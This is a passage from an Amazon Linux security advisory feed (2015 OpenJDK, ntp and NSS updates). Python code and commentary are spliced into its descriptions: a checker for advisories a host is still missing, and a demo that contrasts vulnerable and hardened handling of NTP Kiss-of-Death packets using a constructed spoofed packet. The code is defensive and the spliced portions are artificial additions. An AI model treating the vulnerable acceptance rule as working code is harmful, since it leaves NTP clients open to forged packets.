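    "ALAS-2015-602": ("php55", ("0", "5.5.30", "1.110.amzn1")),
    "ALAS-2015-603": ("kernel", ("0", "4.1.10", "17.31.amzn1")),
    "ALAS-2015-604": ("libwmf", ("0", "0.2.8.4", "41.11.amzn1")),
    "ALAS-2015-605": ("java-1.7.0-openjdk", ("1", "1.7.0.91", "2.6.2.2.63.amzn1")),
}

# Constructed sample of: rpm -qa --qf '%{NAME}\t%{EPOCH}\t%{VERSION}\t%{RELEASE}\n'
# rpm prints "(none)" for packages without an explicit epoch.
RPM_QA = """\
php55\t(none)\t5.5.28\t1.105.amzn1
kernel\t(none)\t4.1.7\t15.23.amzn1
kernel\t(none)\t4.1.10\t17.31.amzn1
libwmf\t(none)\t0.2.8.4\t41.11.amzn1
java-1.7.0-openjdk\t1\t1.7.0.85\t2.6.1.3.61.amzn1
"""


def parse_rpm_qa(text):
    """Map package name to the newest installed (epoch, version, release);
    several kernels are normally installed at once, so keep the highest."""
    installed = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        name, epoch, ver, rel = line.split("\t")
        evr = ("0" if epoch == "(none)" else epoch, ver, rel)
        if name not in installed or evr_cmp(evr, installed[name]) > 0:
            installed[name] = evr
    return installed


def running_kernel_evr(uname_r):
    """Turn a uname -r string such as 4.1.7-15.23.amzn1.x86_64 into an EVR;
    Amazon Linux kernels carry epoch 0 and append the arch to the release."""
    ver, rel = uname_r.split("-", 1)
    for arch in ("x86_64", "i686"):
        if rel.endswith("." + arch):
            rel = rel[: -len(arch) - 1]
    return ("0", ver, rel)


def missing_advisories(installed, uname_r):
    """Return the advisory ids whose fix is not yet in effect on this host.
    The kernel is judged by the running version: an installed but not yet
    booted kernel does not close a kernel advisory."""
    gaps = []
    for alas, (name, fixed) in sorted(FIXED.items()):
        if name == "kernel":
            have = running_kernel_evr(uname_r)
        else:
            have = installed.get(name)
            if have is None:
                continue  # package not installed: advisory does not apply
        if evr_cmp(have, fixed) == -1:
            gaps.append(alas)
    return gaps


if __name__ == "__main__":
    print(missing_advisories(parse_rpm_qa(RPM_QA), "4.1.7-15.23.amzn1.x86_64"))
```

The epoch matters here because java-1.7.0-openjdk carries epoch 1 in its pkglist while php55, kernel and libwmf carry epoch 0; a plain comparison of version strings ignores the epoch and would mis-rank the Java package, which is why evr_cmp starts with it. The kernel rule matters because yum installs a new kernel alongside the old one: in the constructed sample 4.1.10-17.31.amzn1 is installed, but until the host reboots into it ALAS-2015-603 is still reported as open.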
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4734" title="" id="CVE-2015-4734" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4803" title="" id="CVE-2015-4803" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4805" title="" id="CVE-2015-4805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4806" title="" id="CVE-2015-4806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4835" title="" id="CVE-2015-4835" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4840" title="" id="CVE-2015-4840" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4842" title="" id="CVE-2015-4842" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4843" title="" id="CVE-2015-4843" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4844" title="" id="CVE-2015-4844" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4860" title="" id="CVE-2015-4860" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4872" title="" id="CVE-2015-4872" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4881" title="" id="CVE-2015-4881" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4882" title="" id="CVE-2015-4882" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4883" title="" id="CVE-2015-4883" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4893" title="" id="CVE-2015-4893" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4903" title="" id="CVE-2015-4903" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4911" title="" id="CVE-2015-4911" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1920.html" title="" id="RHSA-2015:1920" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk" version="1.7.0.91" release="2.6.2.2.63.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.91-2.6.2.2.63.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.91" release="2.6.2.2.63.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.91-2.6.2.2.63.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.91" release="2.6.2.2.63.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.91-2.6.2.2.63.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.91" release="2.6.2.2.63.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.91-2.6.2.2.63.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.91" release="2.6.2.2.63.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.91-2.6.2.2.63.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.91" release="2.6.2.2.63.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.91-2.6.2.2.63.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.91" release="2.6.2.2.63.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.91-2.6.2.2.63.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.91" release="2.6.2.2.63.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.91-2.6.2.2.63.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.91" release="2.6.2.2.63.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.91-2.6.2.2.63.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.91" release="2.6.2.2.63.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.91-2.6.2.2.63.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.91" release="2.6.2.2.63.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.91-2.6.2.2.63.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-606</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-606: important priority package update for java-1.8.0-openjdk</title><issued date="2015-10-27 16:39:00" /><updated date="2015-10-27 16:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4911:
Multiple denial of service flaws were found in the JAXP component in OpenJDK. A specially crafted XML file could cause a Java application using JAXP to consume an excessive amount of CPU and memory when parsed.
CVE-2015-4903:
Multiple flaws were found in the Libraries, 2D, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4893:
Multiple denial of service flaws were found in the JAXP component in OpenJDK. A specially crafted XML file could cause a Java application using JAXP to consume an excessive amount of CPU and memory when parsed.
CVE-2015-4883:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4882:
Multiple flaws were found in the Libraries, 2D, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4881:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4872:
It was discovered that the Security component in OpenJDK failed to properly check if a certificate satisfied all defined constraints. In certain cases, this could cause a Java application to accept an X.509 certificate which does not meet requirements of the defined policy.
CVE-2015-4868:
A flaw was found in the way the Libraries component in OpenJDK handled certificate revocation lists (CRL). In certain cases, CRL checking code could fail to report a revoked certificate, causing the application to accept it as trusted.
CVE-2015-4860:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4844:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4843:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4842:
Multiple flaws were found in the Libraries, 2D, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4840:
Multiple flaws were found in the Libraries, 2D, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4835:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4806:
Multiple flaws were found in the Libraries, 2D, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2015-4805:
Multiple flaws were discovered in the CORBA, Libraries, RMI, Serialization, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to completely bypass Java sandbox restrictions.
CVE-2015-4803:
Multiple denial of service flaws were found in the JAXP component in OpenJDK. A specially crafted XML file could cause a Java application using JAXP to consume an excessive amount of CPU and memory when parsed.
CVE-2015-4734:
Multiple flaws were found in the Libraries, 2D, CORBA, JAXP, JGSS, and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4734" title="" id="CVE-2015-4734" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4803" title="" id="CVE-2015-4803" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4805" title="" id="CVE-2015-4805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4806" title="" id="CVE-2015-4806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4835" title="" id="CVE-2015-4835" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4840" title="" id="CVE-2015-4840" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4842" title="" id="CVE-2015-4842" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4843" title="" id="CVE-2015-4843" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4844" title="" id="CVE-2015-4844" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4860" title="" id="CVE-2015-4860" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4868" title="" id="CVE-2015-4868" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4872" title="" id="CVE-2015-4872" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4881" title="" id="CVE-2015-4881" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4882" title="" id="CVE-2015-4882" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4883" title="" id="CVE-2015-4883" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4893" title="" id="CVE-2015-4893" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4903" title="" id="CVE-2015-4903" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4911" title="" id="CVE-2015-4911" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1919.html" title="" id="RHSA-2015:1919" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.65-2.b17.7.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.65-2.b17.7.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.65-2.b17.7.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.65-2.b17.7.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.65-2.b17.7.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.65-2.b17.7.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.65-2.b17.7.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.65-2.b17.7.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.65-2.b17.7.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.65-2.b17.7.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.65-2.b17.7.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.65-2.b17.7.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.65" release="2.b17.7.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.65-2.b17.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-607</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-607: important priority package update for ntp</title><issued date="2015-10-27 16:42:00" /><updated date="2015-10-27 16:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7871:
1274265:
CVE-2015-7871 ntp: crypto-NAK symmetric association authentication bypass vulnerability
CVE-2015-7852:
1274261:
CVE-2015-7852 ntp: ntpq atoascii memory corruption vulnerability
CVE-2015-7704:
It was discovered that ntpd as a client did not correctly check timestamps in Kiss-of-Death packets. A remote attacker could use this flaw to send a crafted Kiss-of-Death packet to an ntpd client that would increase the client&#039;s polling interval value, and effectively disable synchronization with the server.
1271070:
CVE-2015-7704 ntp: disabling synchronization via crafted KoD packet
CVE-2015-7702:
1274254:
CVE-2015-7691 CVE-2015-7692 CVE-2015-7702 ntp: incomplete checks in ntp_crypto.c
CVE-2015-7701:
1274255:
CVE-2015-7701 ntp: slow memory leak in CRYPTO_ASSOC
CVE-2015-7692:
1274254:
CVE-2015-7691 CVE-2015-7692 CVE-2015-7702 ntp: incomplete checks in ntp_crypto.c
CVE-2015-7691:
1274254:
CVE-2015-7691 CVE-2015-7692 CVE-2015-7702 ntp: incomplete checks in ntp_crypto.c
CVE-2015-5300:
1271076:
CVE-2015-5300 ntp: MITM attacker can force ntpd to make a step larger than the panic threshold
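The CVE-2015-7704 entry above names the missing check but not what a correct client does with it. The following Python is an added example, not part of this feed or of the ntp project: it decodes the fixed 48-byte NTPv4 header, places the pre-fix acceptance rule beside the hardened one (a Kiss-of-Death is honoured only when its origin timestamp echoes the transmit timestamp of the request the client itself sent, a value an off-path forger cannot know), and runs both over three constructed packets. The packet contents, the last_xmt value and the max_poll clamp in apply_kod are assumptions made up for the demonstration, not ntpd's own code or numbers.

```python
import struct

NTP_HDR_LEN = 48   # fixed NTPv4 header, RFC 5905 section 7.3


def parse_ntp(data):
    """Decode the fixed 48-byte NTPv4 header into a dict of named fields."""
    if NTP_HDR_LEN > len(data):
        raise ValueError("short NTP packet")
    b0, stratum, poll, precision = struct.unpack("!BBbb", data[:4])
    ref_ts, org_ts, rec_ts, xmt_ts = struct.unpack("!QQQQ", data[16:48])
    return {
        "li": b0 // 64,            # leap indicator, top two bits
        "version": (b0 // 8) % 8,  # protocol version, next three bits
        "mode": b0 % 8,            # 3 = client, 4 = server
        "stratum": stratum,        # 0 marks a Kiss-of-Death
        "poll": poll,              # log2 seconds
        "precision": precision,
        "refid": data[12:16],      # four-letter ASCII kiss code when stratum is 0
        "org": org_ts,             # origin: should echo our transmit timestamp
        "rec": rec_ts,
        "xmt": xmt_ts,
    }


def build_packet(mode, stratum, poll, refid, org=0, xmt=0):
    """Assemble a 48-byte header (LI=0, VN=4); used only to construct sample traffic."""
    b0 = 0 * 64 + 4 * 8 + mode
    head = struct.pack("!BBbb", b0, stratum, poll, -20)
    head += struct.pack("!II", 0, 0)          # root delay, root dispersion
    head += refid
    head += struct.pack("!QQQQ", 0, org, 0, xmt)
    return head


def is_kiss_of_death(pkt):
    """RFC 5905 section 7.4: stratum 0 plus an ASCII kiss code in the refid."""
    return pkt["stratum"] == 0 and pkt["refid"].isalpha()


def vulnerable_accept_kod(pkt):
    """Pre-fix rule described by CVE-2015-7704: any KoD arriving from the
    server's address is honoured, origin timestamp never consulted."""
    return is_kiss_of_death(pkt)


def accept_kod(pkt, last_xmt):
    """Hardened rule: honour a KoD only if it is a server-mode reply whose
    origin timestamp equals the transmit timestamp of our last request.
    A zero origin is rejected too, since we never send a zero timestamp."""
    return (is_kiss_of_death(pkt) and pkt["mode"] == 4
            and pkt["org"] != 0 and pkt["org"] == last_xmt)


def apply_kod(pkt, current_poll, max_poll=10):
    """Local back-off policy (assumed for this example, not ntpd's code): on a
    RATE kiss move to the server-requested poll but never past max_poll, so even
    an accepted KoD cannot stretch the interval enough to stop synchronisation."""
    if pkt["refid"] != b"RATE":
        return current_poll
    return min(max(current_poll, pkt["poll"]), max_poll)


def demo():
    """Run both rules over three constructed packets; returns (vulnerable, hardened) verdicts."""
    last_xmt = 0xE1C6A3B280000000   # constructed: transmit timestamp of our last request
    genuine = parse_ntp(build_packet(4, 0, 10, b"RATE", org=last_xmt))
    spoofed = parse_ntp(build_packet(4, 0, 17, b"RATE", org=0))   # off-path forger, cannot fill org
    normal = parse_ntp(build_packet(4, 2, 6, b"\xc0\xa8\x00\x01", org=last_xmt))
    return {
        "genuine_kod": (vulnerable_accept_kod(genuine), accept_kod(genuine, last_xmt)),
        "spoofed_kod": (vulnerable_accept_kod(spoofed), accept_kod(spoofed, last_xmt)),
        "normal_reply": (vulnerable_accept_kod(normal), accept_kod(normal, last_xmt)),
    }


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(name, "vulnerable accepts:", verdict[0], "hardened accepts:", verdict[1])
```

The spoofed packet carries poll 17 (about 36 hours); the vulnerable rule would hand that straight to the poll logic, which is the "effectively disable synchronization" outcome in the entry above, while the hardened rule drops it before any poll change is considered.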
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5300" title="" id="CVE-2015-5300" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7691" title="" id="CVE-2015-7691" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7692" title="" id="CVE-2015-7692" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7701" title="" id="CVE-2015-7701" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7702" title="" id="CVE-2015-7702" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704" title="" id="CVE-2015-7704" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7852" title="" id="CVE-2015-7852" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7871" title="" id="CVE-2015-7871" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1930.html" title="" id="RHSA-2015:1930" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntp" version="4.2.6p5" release="34.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.6p5-34.27.amzn1.x86_64.rpm</filename></package><package name="ntp-doc" version="4.2.6p5" release="34.27.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.6p5-34.27.amzn1.noarch.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="34.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.6p5-34.27.amzn1.x86_64.rpm</filename></package><package name="ntp-perl" version="4.2.6p5" release="34.27.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-perl-4.2.6p5-34.27.amzn1.noarch.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="34.27.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.6p5-34.27.amzn1.x86_64.rpm</filename></package><package name="ntpdate" version="4.2.6p5" release="34.27.amzn1" epoch="0" arch="i686"><filename>Packages/ntpdate-4.2.6p5-34.27.amzn1.i686.rpm</filename></package><package name="ntp" version="4.2.6p5" release="34.27.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.6p5-34.27.amzn1.i686.rpm</filename></package><package name="ntp-debuginfo" version="4.2.6p5" release="34.27.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-debuginfo-4.2.6p5-34.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-608</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-608: critical priority package update for nspr nss-util nss jss</title><issued date="2015-11-05 01:58:00" /><updated date="2015-11-04 22:49:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7183:
A heap-based buffer overflow was found in NSPR. An attacker could use this flaw to cause NSPR to crash or execute arbitrary code with the permissions of the user running an application compiled against the NSPR library.
1269353:
CVE-2015-7183 nspr: heap-buffer overflow in PL_ARENA_ALLOCATE (MFSA 2015-133)
CVE-2015-7182:
A heap-based buffer overflow flaw was found in the way NSS parsed certain ASN.1 structures. An attacker could use this flaw to cause NSS to crash or execute arbitrary code with the permissions of the user running an application compiled against the NSS library.
1269351:
CVE-2015-7182 nss: ASN.1 decoder heap overflow when decoding constructed OCTET STRING that mixes indefinite and definite length encodings (MFSA 2015-133)
CVE-2015-7181:
A use-after-poison flaw was found in the way NSS parsed certain ASN.1 structures. An attacker could use this flaw to cause NSS to crash or execute arbitrary code with the permissions of the user running an application compiled against the NSS library.
1269345:
CVE-2015-7181 nss: use-after-poison in sec_asn1d_parse_leaf() (MFSA 2015-133)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7181" title="" id="CVE-2015-7181" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7182" title="" id="CVE-2015-7182" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7183" title="" id="CVE-2015-7183" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1981.html" title="" id="RHSA-2015:1981" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nspr" version="4.10.8" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-4.10.8-2.35.amzn1.x86_64.rpm</filename></package><package name="nspr-debuginfo" version="4.10.8" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-debuginfo-4.10.8-2.35.amzn1.x86_64.rpm</filename></package><package name="nspr-devel" version="4.10.8" release="2.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-devel-4.10.8-2.35.amzn1.x86_64.rpm</filename></package><package name="nspr-debuginfo" version="4.10.8" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-debuginfo-4.10.8-2.35.amzn1.i686.rpm</filename></package><package name="nspr" version="4.10.8" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-4.10.8-2.35.amzn1.i686.rpm</filename></package><package name="nspr-devel" version="4.10.8" release="2.35.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-devel-4.10.8-2.35.amzn1.i686.rpm</filename></package><package name="nss-util-devel" version="3.19.1" release="4.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-devel-3.19.1-4.47.amzn1.x86_64.rpm</filename></package><package name="nss-util" version="3.19.1" release="4.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-3.19.1-4.47.amzn1.x86_64.rpm</filename></package><package name="nss-util-debuginfo" version="3.19.1" release="4.47.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/nss-util-debuginfo-3.19.1-4.47.amzn1.x86_64.rpm</filename></package><package name="nss-util-debuginfo" version="3.19.1" release="4.47.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-debuginfo-3.19.1-4.47.amzn1.i686.rpm</filename></package><package name="nss-util" version="3.19.1" release="4.47.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-3.19.1-4.47.amzn1.i686.rpm</filename></package><package name="nss-util-devel" version="3.19.1" release="4.47.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-devel-3.19.1-4.47.amzn1.i686.rpm</filename></package><package name="nss" version="3.19.1" release="7.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.19.1-7.74.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.19.1" release="7.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.19.1-7.74.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.19.1" release="7.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.19.1-7.74.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.19.1" release="7.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.19.1-7.74.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.19.1" release="7.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.19.1-7.74.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.19.1" release="7.74.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.19.1-7.74.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.19.1" release="7.74.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.19.1-7.74.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.19.1" release="7.74.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.19.1-7.74.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.19.1" 
